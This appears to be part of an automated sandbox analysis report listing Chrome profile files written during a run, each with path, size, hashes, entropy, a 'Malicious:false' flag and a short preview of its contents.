                                                                                                                                                SHA-256:A9793BD0271D2953FA1F44CEB74A349F5384644528FC346AB141BD42D0BDDA2C
                                                                                                                                                SHA-512:4E8C83708D7AFEF6B59488A106CE3CF2C389E5EC11495BA113DEFECA9087E8A6CCD85C36F871A9D14FA412C617E54EECA6797AC00680FDA0CB59251F94D2EA09
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:41.764 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/10/29-14:10:41.765 df0 Recovering log #3.2021/10/29-14:10:41.766 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):420
                                                                                                                                                Entropy (8bit):4.985305467053914
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ac7d1c27-d7ae-4dfb-862c-070a5827ea1e.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):17092
                                                                                                                                                Entropy (8bit):5.583181891141964
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtpLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUPDLWo4h:WLlAk1kXqKf/pUZNCgVLH2HfrrUuoO
                                                                                                                                                MD5:FBB21F03F922068D76A443D7681BC18A
                                                                                                                                                SHA1:559BEFF9C85046840A57211712D2F54AE125D95B
                                                                                                                                                SHA-256:B20A825A2AF7FB06E581B754DCAD60260DD1329A2A6A355B8A0687D00D810F7A
                                                                                                                                                SHA-512:1C19F702C12476ED0DCD5FB569CF9A185C6818C878C3C5D8321D6D430B81B39AF5CB9BCED104A95AAA1279E236317D61A76301F6779E9B5449BE211CD10CE55B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16
                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MANIFEST-000004.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16
                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MANIFEST-000004.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):136
                                                                                                                                                Entropy (8bit):4.460609817731167
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:tUKj5U5MfRUcF30yZmwv2S5U5MfRXVNFWSV8tS5U5MfRXVNFWSWGv:maEeRUIZmwBEeRMSVhEeRMStv
                                                                                                                                                MD5:ED595A3BDACDE073C1297DF727DBC4D0
                                                                                                                                                SHA1:0D273E01F6A8B0C77892ADAD1909650E61A9EF77
                                                                                                                                                SHA-256:56550BDC600F9DD8BB9134E4F954A9D1FC0939DA04F22FDD38B110BFB0866D6E
                                                                                                                                                SHA-512:2A40594973C8947C63CFDB071F266413747CF19C424EFC121C5EDD6854C34D373950446D8301FDFFBECF2FF4F621CC25BEDE0EE948E4160B1C7AF7D9FF8BBA4B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:41.124 8f4 Recovering log #3.2021/10/29-14:10:42.682 8f4 Delete type=0 #3.2021/10/29-14:10:42.682 8f4 Delete type=3 #2.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):136
                                                                                                                                                Entropy (8bit):4.460609817731167
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:tUKj5U5MfRUcF30yZmwv2S5U5MfRXVNFWSV8tS5U5MfRXVNFWSWGv:maEeRUIZmwBEeRMSVhEeRMStv
                                                                                                                                                MD5:ED595A3BDACDE073C1297DF727DBC4D0
                                                                                                                                                SHA1:0D273E01F6A8B0C77892ADAD1909650E61A9EF77
                                                                                                                                                SHA-256:56550BDC600F9DD8BB9134E4F954A9D1FC0939DA04F22FDD38B110BFB0866D6E
                                                                                                                                                SHA-512:2A40594973C8947C63CFDB071F266413747CF19C424EFC121C5EDD6854C34D373950446D8301FDFFBECF2FF4F621CC25BEDE0EE948E4160B1C7AF7D9FF8BBA4B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:41.124 8f4 Recovering log #3.2021/10/29-14:10:42.682 8f4 Delete type=0 #3.2021/10/29-14:10:42.682 8f4 Delete type=3 #2.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:MPEG-4 LOAS
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):50
                                                                                                                                                Entropy (8bit):5.028758439731456
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
                                                                                                                                                MD5:031D6D1E28FE41A9BDCBD8A21DA92DF1
                                                                                                                                                SHA1:38CEE81CB035A60A23D6E045E5D72116F2A58683
                                                                                                                                                SHA-256:B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
                                                                                                                                                SHA-512:E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: V........leveldb.BytewiseComparator...#...........
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e693ec52-2d0e-4227-8774-954423d894b9.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ee68a962-742b-43eb-93af-8db2e86d8ed6.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.977948195597817
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFc5I9pcKI1fok0JCKL8aTkjuzbOTQVuwn:n8pCF/9pcja4KJkjA
                                                                                                                                                MD5:403C2C47933957AA76729FEE38AAC01B
                                                                                                                                                SHA1:5A82E7091A8D5BFC88A4B52F309D5165A5203B2E
                                                                                                                                                SHA-256:8BFECC26C3A718F73B8D4EEA149967FF700177190CC8A1F4304286A337C348F6
                                                                                                                                                SHA-512:2DABEEC46ECDC95366EFEAEDD6A676B71FAD3605DC851839DA9434A4F48D302DBDAA7934219910F3F623273DAC59488A22F1A269E54F3E29F2B700F599185AFF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2151
                                                                                                                                                Entropy (8bit):4.89628161613295
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Y2TntwCXGDH3qz5sCGsQRLsC2HZrsysAMyKs4MHKsmMHgzYhbD:JTnOCXGDHazpCmZrsOM9GIG9hH
                                                                                                                                                MD5:906A257501BB067F8C7EC0583389BD7E
                                                                                                                                                SHA1:3EB950BD6BBE5D2BD5BBF5AAB211A306295062FF
                                                                                                                                                SHA-256:E3221CD0FCEA91239BC8428F5F1661EDFCC2D8E4E019212552E4D5487FE824B3
                                                                                                                                                SHA-512:DE030BD9541604557042C7CC3CF3DCF0DDEA5FF00D0CF7198D2AA4CD1F0829D791E22D75B41C05BA23AC23ADFCE39712A6E2F4E2958A73C1E4A41A5352D4986B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282607428238388","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282607428244406","port":443,"protocol_str":"quic"}],"isol
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4219
                                                                                                                                                Entropy (8bit):4.871684703914691
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):335
                                                                                                                                                Entropy (8bit):5.126205610080349
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeR2q2PWXp+N23iKKdKfrzAdIFUtnEeRsBZmwBEeRsbkwOWXp+N23iKKdKfrzS:pvkva5Kk9FUtnvqB/Bvqb5f5Kk2J
                                                                                                                                                MD5:BC3D75492A9CEDB07489A2B2AA0896C0
                                                                                                                                                SHA1:4571A89962260C4A10B0054E3E1235507887E42D
                                                                                                                                                SHA-256:2B82B394BCCEB5A449A994A8AC220A776B1D42CAD16D41A8CFBA9D18ADDA97B9
                                                                                                                                                SHA-512:BB625611546CAD40183386B96C2A256DC84A25F91937E1CD4F9BE40824CF2FDA6A12AB7AD2C7BD066432B46417E0F154703C3EA132C40C2D087EFED559A00140
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.200 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/10/29-14:10:44.201 df0 Recovering log #3.2021/10/29-14:10:44.201 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old8f (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):335
                                                                                                                                                Entropy (8bit):5.126205610080349
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeR2q2PWXp+N23iKKdKfrzAdIFUtnEeRsBZmwBEeRsbkwOWXp+N23iKKdKfrzS:pvkva5Kk9FUtnvqB/Bvqb5f5Kk2J
                                                                                                                                                MD5:BC3D75492A9CEDB07489A2B2AA0896C0
                                                                                                                                                SHA1:4571A89962260C4A10B0054E3E1235507887E42D
                                                                                                                                                SHA-256:2B82B394BCCEB5A449A994A8AC220A776B1D42CAD16D41A8CFBA9D18ADDA97B9
                                                                                                                                                SHA-512:BB625611546CAD40183386B96C2A256DC84A25F91937E1CD4F9BE40824CF2FDA6A12AB7AD2C7BD066432B46417E0F154703C3EA132C40C2D087EFED559A00140
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:44.200 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/10/29-14:10:44.201 df0 Recovering log #3.2021/10/29-14:10:44.201 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270336
                                                                                                                                                Entropy (8bit):0.0018238520723782249
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zELqCjtl:/M/xT02zSBl
                                                                                                                                                MD5:4D6A87B837034502A12B3821F7C67DB9
                                                                                                                                                SHA1:2D9AEFD5997E23FA1AC4FCD4F3BEF29FB8514207
                                                                                                                                                SHA-256:774273543D373714C0F766A844038E50D14A69C70281883599D0EF65F7E10D92
                                                                                                                                                SHA-512:599B9EF531293B6AE2D99E2F105E0A5ECE1AD8CF998FD0F14B812A62080527B0AC4BB67970E761D05B6CB5C1ED5AC3D313E05812E7BEF20AFD1FAC7394B797D8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106
                                                                                                                                                Entropy (8bit):3.138546519832722
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13
                                                                                                                                                Entropy (8bit):2.8150724101159437
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Yx7:4
                                                                                                                                                MD5:C422F72BA41F662A919ED0B70E5C3289
                                                                                                                                                SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                                                                                                                SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                                                                                                                SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 85.0.4183.121
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780072694005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hrFLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:pFLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:9A3435BB2916D49F5662DF2DF9B0234A
                                                                                                                                                SHA1:7FB511EA0AB19F8497578647E031083111A67A9C
                                                                                                                                                SHA-256:BFD8A4F5CCA6D59405E9D0E4FFDB32E8A37EAFBAF1855AE9F4FD57DABD10CCBA
                                                                                                                                                SHA-512:9CE8ECCD4AF9E34CC3FAF9F8BE21E3B591140366FC947FDB8238AD2C0808C8AEA7FD0FB91B67A1F2F50F644793DC6A328EEC02D4E9C8C12BA6DE2F0B997B9BB2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State2. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local StateMP (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780431502545
                                                                                                                                                Encrypted:false
